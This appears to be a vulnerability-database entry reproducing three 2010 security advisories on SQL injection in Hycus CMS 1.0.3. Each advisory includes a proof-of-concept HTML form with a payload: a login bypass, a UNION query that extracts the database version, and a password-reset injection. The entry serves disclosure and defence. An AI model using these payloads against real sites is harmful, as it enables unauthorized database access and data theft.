ID

VAR-E-201012-0611


TITLE

Hycus CMS 1.0.3 SQL Injection

Trust: 0.5

sources: PACKETSTORM: 96875

DESCRIPTION

Hycus CMS version 1.0.3 suffers from a remote SQL injection vulnerability.

Trust: 0.5

sources: PACKETSTORM: 96875

AFFECTED PRODUCTS

vendor:hycusmodel:cmsscope:eqversion:1.0.3

Trust: 0.5

sources: PACKETSTORM: 96875

EXPLOIT

===============================
Vulnerability ID: HTB22739
Reference: http://www.htbridge.ch/advisory/sql_injection_in_hycus_cms_1.html
Product: Hycus CMS
Vendor: Hycus Web Development Team ( http://www.hycus.com/ )
Vulnerable Version: 1.0.3
Vendor Notification: 07 December 2010
Vulnerability Type: SQL Injection
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in "usr_email" variable.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:

<form action="http://[host]/?user/1/hlogin.html" method="post" name="main" >
<input type="hidden" name="usr_email" value="1' OR 1=1 -- 1"/>
<input type="hidden" name="pwd" value="any"/>
<input type="submit" value="submit" name="submit" />
</form>

===============================
Vulnerability ID: HTB22740
Reference: http://www.htbridge.ch/advisory/sql_injection_in_hycus_cms_2.html
Product: Hycus CMS
Vendor: Hycus Web Development Team ( http://www.hycus.com/ )
Vulnerable Version: 1.0.3
Vendor Notification: 07 December 2010
Vulnerability Type: SQL Injection
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in "q" variable.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:

<form action="http://[host]/?search/1.html" method="post" name="main" >
<input type="hidden" name="q" value="search' union select 1,2,@@version -- 3"/>
<input type="submit" value="submit" name="submit" />
</form>

===============================
Vulnerability ID: HTB22741
Reference: http://www.htbridge.ch/advisory/sql_injection_in_hycus_cms_3.html
Product: Hycus CMS
Vendor: Hycus Web Development Team ( http://www.hycus.com/ )
Vulnerable Version: 1.0.3
Vendor Notification: 07 December 2010
Vulnerability Type: SQL Injection
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in "useremail" variable.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:

<form action="http://[host]/?user/1/forgotpass.html" method="post" name="main" >
<input type="hidden" name="useremail" value="1'SQL_CODE"/>
<input type="submit" value="submit" name="submit" />
</form>

Trust: 0.5

sources: PACKETSTORM: 96875

EXPLOIT HASH

LOCAL

SOURCE

md5: 108eb5e8b5e737750040cdad8eeb0e53
sha-1: 522a0b8bb7615f2d727f3b014e3b467f5cff8b58
sha-256: 566c93cd86f8bef30612325b1d69636520fc45fbc3145aabad98582d47fdc784
md5: 108eb5e8b5e737750040cdad8eeb0e53

Trust: 0.5

sources: PACKETSTORM: 96875

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 96875

TYPE

sql injection

Trust: 0.5

sources: PACKETSTORM: 96875

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

tag:sql injection

Trust: 0.5

sources: PACKETSTORM: 96875

CREDITS

High-Tech Bridge SA

Trust: 0.5

sources: PACKETSTORM: 96875

EXTERNAL IDS

db:PACKETSTORMid:96875

Trust: 0.5

sources: PACKETSTORM: 96875

SOURCES

db:PACKETSTORMid:96875

LAST UPDATE DATE

2022-07-27T09:25:13.254000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:96875date:2010-12-21T18:31:23